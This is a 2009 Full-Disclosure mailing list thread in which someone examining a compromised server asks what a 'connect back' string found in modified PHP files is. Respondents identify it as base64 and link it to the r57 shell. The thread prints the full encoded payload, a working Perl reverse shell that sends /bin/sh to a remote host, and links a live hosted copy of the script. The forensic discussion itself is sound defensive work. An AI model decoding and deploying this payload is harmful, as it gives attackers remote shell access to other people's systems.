Re: connect back PHP hack

[Justin Rogosky <jrogosky () gmail com>]

Just as an FYI:

Webscarab and Paros (web application proxies) both have a good Base64
decoder built-in.

This is useful for any sniffed requested using basic authentication as
well.

--Justin

 
On Tue, 2009-02-10 at 14:34 -0500, sr. wrote:
> i really appreciate all of the responses. this is what community is all about.
>
> i'd seen the "==" in other encoding schemes, but just wasn't sure and
> wanted a quick response...thanks to everyone who responded!
>
> I'll post the rest of my findings on here asap. i'm looking into an
> old compromised machine. this is nothing new..
>
> whoever mentioned the r57 shell, you're probably right as the script
> connects to a remote box @ port 11457. this is r57 behaviour.
>
> i also found a copy of the same script i'm dissecting on someone
> else's box, you can check it out here:
> http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php
>
> in my case, a bunch of php files were modified. i'll zip everything up
> and host it so you can all analyze...
>
> thx,
>
> sr. aka "fabrizio siciliano"
>
>
>
>
>
> On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro <gcastrop () gmail com> wrote:
> > "Sr."
> >
> >  This is base64 encoded.
> >
> > 2009/2/10 sr. <staticrez () gmail com>:
> > > can anyone tell me what encoding this is?
> > >
> > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
> > > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
> > > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
> > > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
> > > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
> > > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
> > > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
> > >
> > > this has to do with old php 4.x.x version with magic quotes enabled.
> > > i'm just trying to figure out what the connect back code does.
> > >
> > > any input is much appreciated.
> > >
> > > thx,
> > >
> > > sr.
> >
> > --
> > Saludos,
> >     Gustavo Castro Puig.
> >     E-Mail: gcastrop () gmail com
> >
> > LPI Level-1 Certified (https://www.lpi.org/es/verify.html
> > LPID:LPI000042304 Verification Code: hp6re8w5qg )
> > -----BEGIN GEEK CODE BLOCK-----
> > Version: 3.12
> > GCS/CM/IT/ED dx s-:- a? C(+++)$ UL++++*$ P+ L++++(++)$ E--- W+++$ N+ o?
> > K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++(++++) DI+++
> > D++ G++ e++ h--- r y+++
> > ------END GEEK CODE BLOCK------
> > Registered Linux User #69342

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/